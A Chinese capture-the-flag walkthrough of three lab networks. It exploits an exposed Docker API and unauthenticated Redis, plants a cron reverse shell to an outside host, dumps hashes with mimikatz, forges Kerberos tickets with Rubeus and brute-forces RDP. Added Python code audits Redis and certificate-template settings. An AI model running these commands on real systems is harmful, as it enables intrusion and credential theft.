春秋云境...
Unauthorized

```
└> fscan -h 47.92.91.146

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 47.92.91.146    is alive
[*] Icmp alive hosts len is: 1
47.92.91.146:80 open
47.92.91.146:22 open
47.92.91.146:2375 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://47.92.91.146        code:200 len:27170  title:某某装饰
[*] WebTitle: http://47.92.91.146:2375   code:404 len:29     title:None
[+] http://47.92.91.146:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://47.92.91.146:2375 poc-yaml-go-pprof-leak
已完成 3/3
[*] 扫描结束,耗时: 27.951911999s
```
Port 2375 is the Docker API exposed without authentication, which allows container escape. First, look at the images present on the Docker host:

```
┌──(root㉿kali)-[~]
└─
REPOSITORY   TAG      IMAGE ID       CREATED        SIZE
php          latest   7988a23aed21   6 months ago   489MB
mysql        5.7      34e82e623818   7 months ago   429MB
ubuntu       latest   27941809078c   7 months ago   77.8MB
ubuntu       18.04    ad080923604a   7 months ago   63.1MB
alpine       latest   e66264b98777   8 months ago   5.53MB
```
Start a container with the server's root filesystem mounted at /mnt inside it:

```bash
docker -H tcp://47.92.91.146:2375 run -it -v /:/mnt ubuntu:18.04 /bin/bash
```
Generate a key pair on the cloud server (id_rsa is the private key, id_rsa.pub the public key) and write the public key onto the target machine:

```bash
echo "ssh-rsa " >/mnt/root/.ssh/authorized_keys
```

```bash
scp -r /tmp/nps root@47.92.91.146:/tmp
scp /tmp/fscan_amd64 root@47.92.91.146:/tmp
```
Scan the whole internal subnet with fscan:

```
root@localhost:/tmp
fscan version: 1.8.2
start infoscan
172.22.7.67:21 open
172.22.7.13:22 open
172.22.7.31:80 open
172.22.7.67:80 open
172.22.7.13:80 open
172.22.7.6:135 open
172.22.7.31:135 open
172.22.7.67:135 open
172.22.7.6:139 open
172.22.7.31:139 open
172.22.7.67:139 open
172.22.7.6:445 open
172.22.7.31:445 open
172.22.7.67:445 open
172.22.7.6:88 open
172.22.7.13:2375 open
172.22.7.67:8081 open
[*] alive ports len is: 17
start vulscan
已完成 0/17
[-] Ms17010 172.22.7.31 read tcp 172.22.7.13:44620->172.22.7.31:445: read: connection reset by peer
[*] NetBios: 172.22.7.31    XIAORANG\ADCS
[*] NetBios: 172.22.7.67    XIAORANG\WIN-9BMCSG0S
[*] NetInfo:
[*]172.22.7.6
   [->]DC02
   [->]172.22.7.6
[*] NetInfo:
[*]172.22.7.31
   [->]ADCS
   [->]172.22.7.31
[*] NetBios: 172.22.7.6     [+]DC XIAORANG\DC02
[*] WebTitle: http://172.22.7.13:2375   code:404 len:29     title:None
[*] WebTitle: http://172.22.7.13        code:200 len:27170  title:某某装饰
[*] NetInfo:
[*]172.22.7.67
   [->]WIN-9BMCSG0S
   [->]172.22.7.67
[+] ftp://172.22.7.67:21:anonymous
   [->]1-1P3201024310-L.zip
   [->]1-1P320102603C1.zip
   [->]1-1P320102609447.zip
   [->]1-1P320102615Q3.zip
   [->]1-1P320102621J7.zip
   [->]1-1P320102J30-L.zip
[*] WebTitle: http://172.22.7.31        code:200 len:703    title:IIS Windows Server
[+] http://172.22.7.31 poc-yaml-active-directory-certsrv-detect
[*] WebTitle: http://172.22.7.67        code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.7.67:8081   code:200 len:4621   title:公司管理后台
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak
已完成 17/17
```

The environment crashed and went offline at this point.
Brute4Road

```
└> fscan -h 47.92.223.156
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 47.92.223.156   is alive
[*] Icmp alive hosts len is: 1
47.92.223.156:80 open
47.92.223.156:21 open
47.92.223.156:22 open
47.92.223.156:6379 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://47.92.223.156      code:200 len:4833   title:Welcome to CentOS
[+] Redis:47.92.223.156:6379 unauthorized file:/usr/local/redis/db/
[+] ftp://47.92.223.156:21:anonymous
   [->]pub
已完成 4/4
```
Redis is accessible without authentication; run the master-slave replication RCE from the VPS:

```
root@VM-8-9-ubuntu:/tmp/redis-rogue-server
                                                 @copyright n0b0dy @ r3kapig
[info] TARGET 47.92.240.132:6379
[info] SERVER 43.138.127.132:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] whoami
[>>] redis
```
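As an added example (not part of the original writeup or of redis-rogue-server), the audit below reads a redis.conf and reports the three properties the replication attack above depends on: a reachable listener, no authentication, and the SLAVEOF/REPLICAOF, MODULE and CONFIG commands still callable. Both config samples are constructed; only the dump directory /usr/local/redis/db/ comes from the fscan output.

```python
"""Audit a redis.conf for the settings the unauthenticated replication /
MODULE LOAD technique relies on, and show the hardened form.

The rogue-master technique needs all of the following from the victim:
  - a reachable listener (non-loopback bind with protected-mode off),
  - no authentication (no requirepass),
  - SLAVEOF/REPLICAOF, MODULE and CONFIG still callable.
"""

# Commands the technique chains: repoint replication at the rogue master,
# pull a crafted RDB as the dump file, then load it as a module.
DANGEROUS_COMMANDS = {"slaveof", "replicaof", "module", "config"}


def parse_redis_conf(text: str) -> dict[str, list[list[str]]]:
    """Map each directive to the list of its argument lists.

    Directives such as rename-command may repeat, hence the outer list.
    """
    conf: dict[str, list[list[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        directive, *args = line.split()
        conf.setdefault(directive.lower(), []).append(args)
    return conf


def is_loopback(addr: str) -> bool:
    """Redis allows a leading '-' meaning 'ignore if the address is missing'."""
    return addr.lstrip("-") in ("127.0.0.1", "::1", "localhost")


def audit_redis_conf(text: str) -> list[str]:
    """Return findings; an empty list means none of the weak settings remain."""
    conf = parse_redis_conf(text)
    findings: list[str] = []

    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(not is_loopback(b) for b in binds):  # no bind = all interfaces
        findings.append("bind: listening on a non-loopback address")

    protected = conf.get("protected-mode", [["yes"]])[0]  # Redis default is yes
    if protected and protected[0].lower() == "no":
        findings.append("protected-mode no: remote clients accepted without auth")

    if "requirepass" not in conf:
        findings.append("requirepass missing: no authentication")

    # rename-command <CMD> "" removes the command entirely.
    disabled = {
        args[0].lower()
        for args in conf.get("rename-command", [])
        if len(args) >= 2 and args[1] in ('""', "''")
    }
    still_on = sorted(DANGEROUS_COMMANDS - disabled)
    if still_on:
        findings.append("commands still enabled: " + ", ".join(still_on))
    return findings


# Constructed samples; only the dump directory is taken from the fscan output.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /usr/local/redis/db/
"""

HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
dir /usr/local/redis/db/
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, "->", audit_redis_conf(conf) or "no findings")
```

Disabling CONFIG also breaks any tooling that relies on CONFIG GET/SET, so on Redis 6+ an ACL that denies those commands to the application user is the finer-grained alternative.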
The environment drops connections easily, so set up a cron job:

```bash
echo "* * * * * bash -i >& /dev/tcp/43.138.127.132/3333 0>&1" | crontab -
```
The first flag requires privilege escalation; escalate through a SUID binary:

```bash
find / -user root -perm -4000 -exec ls -ldb {} \;
base64 "/home/redis/flag/flag01" | base64 --decode
```
Get the internal subnet with netstat -ano:

```
./fscan_linux -h 172.22.2.1/24
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.34     is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.18     is alive
[*] Icmp alive hosts len is: 5
172.22.2.34:135 open
172.22.2.3:135 open
172.22.2.18:80 open
172.22.2.16:80 open
172.22.2.16:139 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.18:139 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.34:139 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.16:445 open
172.22.2.18:445 open
172.22.2.3:445 open
172.22.2.16:135 open
172.22.2.3:139 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] NetBios: 172.22.2.34    XIAORANG\CLIENT01
[*] NetInfo:
[*]172.22.2.3
   [->]DC
   [->]172.22.2.3
[*] NetInfo:
[*]172.22.2.34
   [->]CLIENT01
   [->]172.22.2.34
[*] WebTitle: http://172.22.2.16        code:404 len:315    title:Not Found
[*] WebTitle: http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] NetBios: 172.22.2.16    MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] NetBios: 172.22.2.18    WORKGROUP\UBUNTU-WEB02
[*] 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[+] Redis:172.22.2.7:6379 unauthorized file:/usr/local/redis/db/dump.rdb
[*] 172.22.2.3   (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.2.3     [+]DC DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[+] ftp://172.22.2.7:21:anonymous
   [->]pub
[*] WebTitle: http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点
```
Edit the /etc/proxychains4.conf configuration file to proxy through the foothold, then run `proxychains4 wpscan --url http://172.22.2.18/`. Vulnerability reference: https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

Write a shell and connect with AntSword (蚁剑); flag2 is in the database. The flag database contains a table like this, which leads to MSSQL; brute-force the password: ElGNkOiC

```sql
exec sp_configure 'show advanced options', 1; reconfigure;
exec sp_configure 'xp_cmdshell', 1; reconfigure;
exec master..xp_cmdshell "whoami"
```
Create a user:

```
C:/迅雷下载/BadPotatoNet4.exe "net user spoic a123456 /add"
```

Add it to the administrators group:

```
C:/迅雷下载/BadPotatoNet4.exe "net localgroup administrators spoic /add"
```
Connect over Remote Desktop (on several issued environments RDP inexplicably refused to connect), then upload mimikatz to dump the domain account hashes:

```
mimikatz
Authentication Id : 0 ; 92700 (00000000:00016a1c)
Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/2/10 10:24:05
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
        msv :
         [00000003] Primary
         * Username   : MSSQLSERVER$
         * Domain     : XIAORANG
         * NTLM       : 06887f7bfcebf1d3a321680662263b83
         * SHA1       : 0ebee4e9d5966a611735b43e929ceea90c7074d5
        tspkg :
        wdigest :
         * Username   : MSSQLSERVER$
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : MSSQLSERVER$
         * Domain     : xiaorang.lab
         * Password   : <machine account password, 240-byte hex dump omitted>
        ssp :
        credman :
```
The MSSQLSERVER machine is configured with constrained delegation to the DC's LDAP and CIFS services, so with only the service (machine) account in hand we can attempt a delegation attack. Upload a pre-compiled Rubeus.exe and use Rubeus to request the tickets:
```
C:/迅雷下载>Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:06887f7bfcebf1d3a321680662263b83 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 06887f7bfcebf1d3a321680662263b83
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      <base64 TGT omitted>

  ServiceName              :  krbtgt/xiaorang.lab
  ServiceRealm             :  XIAORANG.LAB
  UserName                 :  MSSQLSERVER$
  UserRealm                :  XIAORANG.LAB
  StartTime                :  2023/2/10 15:11:12
  EndTime                  :  2023/2/11 1:11:12
  RenewTill                :  2023/2/17 15:11:12
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  kLD0vnyj7ow3I+2pVIxsdw==
  ASREP (key)              :  06887F7BFCEBF1D3A321680662263B83

C:/迅雷下载>Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from the asktgt output above>

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: S4U

[*] Action: S4U

[*] Building S4U2self request for: 'MSSQLSERVER$@XIAORANG.LAB'
[*] Using domain controller: DC.xiaorang.lab (172.22.2.3)
[*] Sending S4U2self request to 172.22.2.3:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'MSSQLSERVER$@XIAORANG.LAB'
[*] base64(ticket.kirbi):

      <base64 S4U2self ticket omitted>

[*] Impersonating user 'Administrator' to target SPN 'LDAP/DC.xiaorang.lab'
[*] Building S4U2proxy request for service: 'LDAP/DC.xiaorang.lab'
[*] Using domain controller: DC.xiaorang.lab (172.22.2.3)
[*] Sending S4U2proxy request to domain controller 172.22.2.3:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'LDAP/DC.xiaorang.lab':

      <base64 service ticket omitted>

[+] Ticket successfully imported!
```
After injecting the ticket, the LDAP service ticket carries DCSync rights, so the hashes of the domain users can be dumped. Then move laterally over WMI and execute commands on the domain controller:

```
┌──(root㉿kali)-[~]
└─
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Dynamic chain  ...  43.138.127.132:50000  ...  172.22.2.3:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Dynamic chain  ...  43.138.127.132:50000  ...  172.22.2.3:135  ...  OK
[proxychains] Dynamic chain  ...  43.138.127.132:50000  ...  172.22.2.3:49666  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
xiaorang\administrator

C:\>
```
Certify

```bash
find / -perm -u=s -type f 2>/dev/null
```

We can see --pty.
```
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.13     is alive
(icmp) Target 172.22.9.26     is alive
(icmp) Target 172.22.9.47     is alive
[*] Icmp alive hosts len is: 5
172.22.9.26:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:445 open
172.22.9.26:445 open
172.22.9.13:445 open
172.22.9.7:445 open
172.22.9.13:139 open
172.22.9.26:139 open
172.22.9.47:139 open
172.22.9.7:139 open
172.22.9.26:135 open
172.22.9.13:135 open
172.22.9.7:135 open
172.22.9.7:88 open
172.22.9.19:8983 open
172.22.9.7:3389 open
172.22.9.26:3389 open
172.22.9.13:3389 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo:
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] NetInfo:
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] WebTitle: http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetInfo:
[*]172.22.9.13
   [->]CA01
   [->]172.22.9.13
[*] NetBios: 172.22.9.47    fileserver                          Windows 6.1
[*] NetBios: 172.22.9.26    XIAORANG\DESKTOP-CBKTVMO
[*] WebTitle: http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.22.9.26        code:200 len:703    title:IIS Windows Server
[*] NetBios: 172.22.9.13    XIAORANG\CA01
[*] NetBios: 172.22.9.7     [+]DC XIAORANG\XIAORANG-DC
[*] 172.22.9.47  (Windows 6.1)
[*] WebTitle: http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin
```

```bash
proxychains smbclient \\\\172.22.9.47\\fileshare
```
Connecting to the file share over SMB gives a hint:

:::info
Yes, you have enumerated smb. But do you know what an SPN is?
:::

Contents of the db file. Brute-force RDP on 3389:

```bash
proxychains4 hydra -L user.txt -P passwd.txt 172.22.9.26 rdp
```

liupeng/fiAzGwEMgTY. Cracking with hashcat yields two more accounts: chenchen/@Passw0rd@ and zhangxia/MyPass2@@6.
```
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-CA01-CA'

    Enterprise CA Name            : xiaorang-CA01-CA
    DNS Hostname                  : CA01.xiaorang.lab
    FullName                      : CA01.xiaorang.lab\xiaorang-CA01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=xiaorang-CA01-CA, DC=xiaorang, DC=lab
    Cert Thumbprint               : E50DC31FF6B0BA683078A2019BC11EA68D8EDE9F
    Cert Serial                   : 63C71D005A6E478D440D21CFC707855A
    Cert Start Date               : 2022/7/13 12:23:11
    Cert End Date                 : 2027/7/13 12:33:10
    Cert Chain                    : CN=xiaorang-CA01-CA,DC=xiaorang,DC=lab
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal
      Allow  Enroll                                     NT AUTHORITY\Authenticated Users    S-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators              S-1-5-32-544
      Allow  ManageCA, ManageCertificates               XIAORANG\Domain Admins              S-1-5-21-2318488573-3353402606-1029629362-512
      Allow  ManageCA, ManageCertificates               XIAORANG\Enterprise Admins          S-1-5-21-2318488573-3353402606-1029629362-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : CA01.xiaorang.lab\xiaorang-CA01-CA
    Template Name                         : XR Manager
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : 安全电子邮件, 加密文件系统, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Domain Computers     S-1-5-21-2318488573-3353402606-1029629362-515
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\wangbin              S-1-5-21-2318488573-3353402606-1029629362-1171
                                      XIAORANG\zhangrui             S-1-5-21-2318488573-3353402606-1029629362-1157
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186

    CA Name                               : CA01.xiaorang.lab\xiaorang-CA01-CA
    Template Name                         : XR Machine
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 服务器身份验证, 客户端身份验证
    mspki-certificate-application-policy  : 服务器身份验证, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Domain Computers     S-1-5-21-2318488573-3353402606-1029629362-515
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519

Certify completed in 00:00:09.9619968
```
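As an added example (not part of the original writeup or of Certify), the check below encodes the four ESC1 conditions and runs them over a transcription of the XR Manager template printed above; 客户端身份验证 is the zh-CN rendering of the Client Authentication EKU. The hardened() variant is one common remediation assumed here, not a state the lab shows.

```python
"""Flag the ESC1 pattern in certificate-template data as Certify prints it.

ESC1 requires all four conditions at once; removing any one of them fixes it:
  1. the template's EKU allows client authentication,
  2. the enrollee may supply the subject (ENROLLEE_SUPPLIES_SUBJECT),
  3. no authorized signatures and no manager approval are required,
  4. a non-privileged principal holds Enrollment rights.
"""
from dataclasses import dataclass, field

# Windows prints EKU names in the CA's locale; the zh-CN CA above shows
# 客户端身份验证, which is "Client Authentication".
CLIENT_AUTH_EKUS = {"客户端身份验证", "Client Authentication"}

# Well-known admin RIDs: Administrator, Domain Admins, Schema Admins, Enterprise Admins.
PRIVILEGED_RIDS = {"500", "512", "518", "519"}
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


@dataclass
class Template:
    name: str
    name_flags: set[str]        # msPKI-Certificate-Name-Flag
    enrollment_flags: set[str]  # mspki-enrollment-flag
    ekus: set[str]              # pkiextendedkeyusage
    signatures_required: int    # Authorized Signatures Required
    enrollment_rights: dict[str, str] = field(default_factory=dict)  # principal -> SID


def is_privileged(sid: str) -> bool:
    """True for BUILTIN\\Administrators and the well-known admin RIDs."""
    return sid == BUILTIN_ADMINISTRATORS or sid.rsplit("-", 1)[-1] in PRIVILEGED_RIDS


def esc1_findings(t: Template) -> list[str]:
    """Return the four ESC1 conditions that hold, or [] if any is missing."""
    reasons: list[str] = []
    if t.ekus & CLIENT_AUTH_EKUS:
        reasons.append("EKU permits client authentication")
    if "ENROLLEE_SUPPLIES_SUBJECT" in t.name_flags:
        reasons.append("enrollee supplies the subject/SAN")
    if t.signatures_required == 0 and "PEND_ALL_REQUESTS" not in t.enrollment_flags:
        reasons.append("no signatures or manager approval required")
    weak = sorted(p for p, sid in t.enrollment_rights.items() if not is_privileged(sid))
    if weak:
        reasons.append("non-privileged enrollers: " + ", ".join(weak))
    return reasons if len(reasons) == 4 else []


def hardened(t: Template) -> Template:
    """Typical remediation: build the subject from AD and require manager approval."""
    return Template(
        name=t.name,
        name_flags=(t.name_flags - {"ENROLLEE_SUPPLIES_SUBJECT"}) | {"SUBJECT_ALT_REQUIRE_UPN"},
        enrollment_flags=t.enrollment_flags | {"PEND_ALL_REQUESTS"},
        ekus=set(t.ekus),
        signatures_required=t.signatures_required,
        enrollment_rights=dict(t.enrollment_rights),
    )


# Transcribed from the Certify output above. Domain Computers counts as
# non-privileged: by default any domain user may add machine accounts.
DOMAIN_SID = "S-1-5-21-2318488573-3353402606-1029629362"
XR_MANAGER = Template(
    name="XR Manager",
    name_flags={"ENROLLEE_SUPPLIES_SUBJECT"},
    enrollment_flags={"INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"},
    ekus={"安全电子邮件", "加密文件系统", "客户端身份验证"},
    signatures_required=0,
    enrollment_rights={
        "XIAORANG\\Administrator": f"{DOMAIN_SID}-500",
        "XIAORANG\\chenchen": f"{DOMAIN_SID}-1128",
        "XIAORANG\\Domain Admins": f"{DOMAIN_SID}-512",
        "XIAORANG\\Domain Computers": f"{DOMAIN_SID}-515",
        "XIAORANG\\Enterprise Admins": f"{DOMAIN_SID}-519",
        "XIAORANG\\wangbin": f"{DOMAIN_SID}-1171",
        "XIAORANG\\zhangrui": f"{DOMAIN_SID}-1157",
        "XIAORANG\\zhangxia": f"{DOMAIN_SID}-1186",
    },
)

if __name__ == "__main__":
    for tpl in (XR_MANAGER, hardened(XR_MANAGER)):
        found = esc1_findings(tpl)
        print(tpl.name, "->", "; ".join(found) if found else "not ESC1")
```

The same data shows why XR Machine is listed too: it carries ENROLLEE_SUPPLIES_SUBJECT, a client-authentication EKU, zero required signatures and enrollment rights for chenchen and zhangxia.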